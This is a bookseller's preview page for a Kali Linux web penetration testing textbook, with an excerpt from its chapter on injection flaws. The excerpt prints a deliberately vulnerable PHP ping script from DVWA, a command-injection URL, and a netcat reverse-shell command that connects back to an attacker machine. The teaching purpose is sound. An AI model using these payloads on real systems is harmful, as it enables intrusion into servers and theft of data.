eBook - ePub
Web Penetration Testing with Kali Linux
Gilberto Najera-Gutierrez, Juned Ahmed Ansari
This is a test
Share book
- 426 pages
- English
- ePUB (mobile friendly)
- Available on iOS & Android
eBook - ePub
Web Penetration Testing with Kali Linux
Gilberto Najera-Gutierrez, Juned Ahmed Ansari
Book details
Book preview
Table of contents
Citations
About This Book
Build your defense against web attacks with Kali Linux, including command injection flaws, crypto implementation layers, and web application security holes
Key Features
- Know how to set up your lab with Kali Linux
- Discover the core concepts of web penetration testing
- Get the tools and techniques you need with Kali Linux
Book Description
Web Penetration Testing with Kali Linux - Third Edition shows you how to set up a lab, helps you understand the nature and mechanics of attacking websites, and explains classical attacks in great depth. This edition is heavily updated for the latest Kali Linux changes and the most recent attacks. Kali Linux shines when it comes to client-side attacks and fuzzing in particular.
From the start of the book, you'll be given a thorough grounding in the concepts of hacking and penetration testing, and you'll see the tools used in Kali Linux that relate to web application hacking. You'll gain a deep understanding of classicalSQL, command-injection flaws, and the many ways to exploit these flaws. Web penetration testing also needs a general overview of client-side attacks, which is rounded out by a long discussion of scripting and input validation flaws.
There is also an important chapter on cryptographic implementation flaws, where we discuss the most recent problems with cryptographic layers in the networking stack.
The importance of these attacks cannot be overstated, and defending against them is relevant to most internet users and, of course, penetration testers.
At the end of the book, you'll use an automated technique called fuzzing to identify flaws in a web application. Finally, you'll gain an understanding of web application vulnerabilities and the ways they can be exploited using the tools in Kali Linux.
What you will learn
- Learn how to set up your lab with Kali Linux
- Understand the core concepts of web penetration testing
- Get to know the tools and techniques you need to use with Kali Linux
- Identify the difference between hacking a web application and network hacking
- Expose vulnerabilities present in web servers and their applications using server-side attacks
- Understand the different techniques used to identify the flavor of web applications
- See standard attacks such as exploiting cross-site request forgery and cross-site scripting flaws
- Get an overview of the art of client-side attacks
- Explore automated attacks such as fuzzing web applications
Who this book is for
Since this book sets out to cover a large number of tools and security fields, it can work as an introduction to practical security skills for beginners in security. In addition, web programmers and also system administrators would benefit from this rigorous introduction to web penetration testing. Basic system administration skills are necessary, and the ability to read code is a must.
Frequently asked questions
How do I cancel my subscription?
Can/how do I download books?
At the moment all of our mobile-responsive ePub books are available to download via the app. Most of our PDFs are also available to download and we're working on making the final remaining ones downloadable now. Learn more here.
What is the difference between the pricing plans?
Both plans give you full access to the library and all of Perlego’s features. The only differences are the price and subscription period: With the annual plan you’ll save around 30% compared to 12 months on the monthly plan.
What is Perlego?
We are an online textbook subscription service, where you can get access to an entire online library for less than the price of a single book per month. With over 1 million books across 1000+ topics, we’ve got you covered! Learn more here.
Do you support text-to-speech?
Look out for the read-aloud symbol on your next book to see if you can listen to it. The read-aloud tool reads text aloud for you, highlighting the text as it is being read. You can pause it, speed it up and slow it down. Learn more here.
Is Web Penetration Testing with Kali Linux an online PDF/ePUB?
Yes, you can access Web Penetration Testing with Kali Linux by Gilberto Najera-Gutierrez, Juned Ahmed Ansari in PDF and/or ePUB format, as well as other popular books in Computer Science & Cyber Security. We have over one million books available in our catalogue for you to explore.
Information
Detecting and Exploiting Injection-Based Flaws
According to the OWASP Top 10 2013 list (https://www.owasp.org/index.php/Top_10_2013-Top_10), the most critical flaw in web applications is the injection flaw, and it has maintained its position in the 2017 list
(https://www.owasp.org/index.php/Top_10-2017_Top_10) release candidate. Interactive web applications take the input from the user, process it, and return the output to the client. When the application is vulnerable to an injection flaw, it accepts the input from the user without proper or even with any validation and still processes it. This results in actions that the application did not intend to perform. The malicious input tricks the application, forcing the underlying components to perform tasks for which the application was not programmed. In other words, an injection flaw allows the attacker to control components of the application at will.
(https://www.owasp.org/index.php/Top_10-2017_Top_10) release candidate. Interactive web applications take the input from the user, process it, and return the output to the client. When the application is vulnerable to an injection flaw, it accepts the input from the user without proper or even with any validation and still processes it. This results in actions that the application did not intend to perform. The malicious input tricks the application, forcing the underlying components to perform tasks for which the application was not programmed. In other words, an injection flaw allows the attacker to control components of the application at will.
In this chapter, we will discuss the major injection flaws in today's web applications, including tools to detect and exploit them, and how to avoid being vulnerable or to fix existing flaws. These flaws include the following:
- Command injection flaw
- SQL injection flaw
- XML-based injections
- NoSQL injections
An injection flaw is used to gain access to the underlying component to which the application is sending data, to execute some task. The following table shows the most common components used by web applications that are often targeted by an injection attack when the input from the user is not sanitized by the application:
| Components | Injection flaws |
| Operating system | Command injection |
| Database | SQL/NoSQL injection |
| Web browser / client | Cross-Site Scripting |
| LDAP directory | LDAP injection |
| XML | XPATH / XML External Entity injection |
Command injection
Web applications, which are dynamic in nature, may use scripts to invoke some functionality within the operating system on the web server to process the input received from the user. An attacker may try to get this input processed at the command line by circumventing the input validation filters implemented by the application. Command injection usually invokes commands on the same web server, but it is possible that the command can be executed on a different server, depending on the architecture of the application.
Let's take a look at a simple code snippet, that is vulnerable to a command injection flaw, taken from DVWA's command injection exercise. It is a very simple script that receives an IP address and sends pings (ICMP packets) to that address:
<?php $target = $_REQUEST[ 'ip' ]; $cmd = shell_exec( 'ping -c 3 ' . $target ); $html .= '<pre>'.$cmd.'</pre>'; echo $html; ?>
As you can see, there is no input validation before accepting the ip parameter from the user, which makes this code vulnerable to a command injection attack. To log in to DVWA, the default credentials are admin/admin.
A malicious user might use the following request to pipe in additional commands, which the application would accept without raising an exception:
http://server/page.php?ip=127.0.0.1;uname -a
The application takes the value of the user input from the client without validation and concatenates it to the ping -c 3 command in order to build the final command that is run on the web server. The response from the server is shown in the following screenshot. The version of the underlying OS is displayed along with the result of pinging the given address as the application failed to validate the user input:
The additional command injected will run using the privileges of the web server. Most web servers nowadays run with restricted privileges, but even with limited rights, the attacker can exploit and steal significant information.
Command injection can be used to make the server download and execute malicious files by injecting the wget commands, or to gain a remote shell to the server, as demonstrated in the following example.
First, set up a listener in Kali Linux. Netcat has a very simple way of doing this:
nc -lvp 12345
Kali Linux is now set to listen for a connection on port 12345. Next, inject the following command into the vulnerable server:
nc.traditional -e /bin/bash 10.7.7.4 12345
On some modern Linux systems, the original Netcat has been replaced by a version that doesn't include some options that may have posed a security risk, such as -e, which allows the execution of commands upon connection. These systems often include the traditional version of Netcat in a command called nc.traditional. When trying to use Netcat to gain access to a remote system, try both options.
Notice that 10.7.7.4 is the IP address of the Kali machine in the example, and 12345 is the TCP port listening for the connection. After sending the request, you should receive the connection in your Kali Linux and be able to issue commands in a noninteractive shell:
A noninteractive shell allows you to execute commands and see the results, but not interact with the commands nor see the error output, such as when using a text editor.
Identifying parameters to inject data
When you are testing a web application for command injection flaws, and you have confirmed that the application is interacting with the command line of the underlying OS, the next step is to manipulate and probe the different parameters in the application and view their responses. The following parameters should be tested for command injection flaws as the application may be using one of these parameters to build a command back on the web server:
- GET: With this method, input parameters are sent in URLs. In the example shown earlier, the input from the client was passed to the server using the GET method and was vulnerable to a command injection flaw. Any user-controlled parameter sent using the GET method request should be tested.
- POST: In this method, the input parameters are sent in the HTTP body. Similar to the input being passed using the GET method; data taken from the end user can also be passed using the POST method in the body of the HTTP request. This could then be used by the web applic...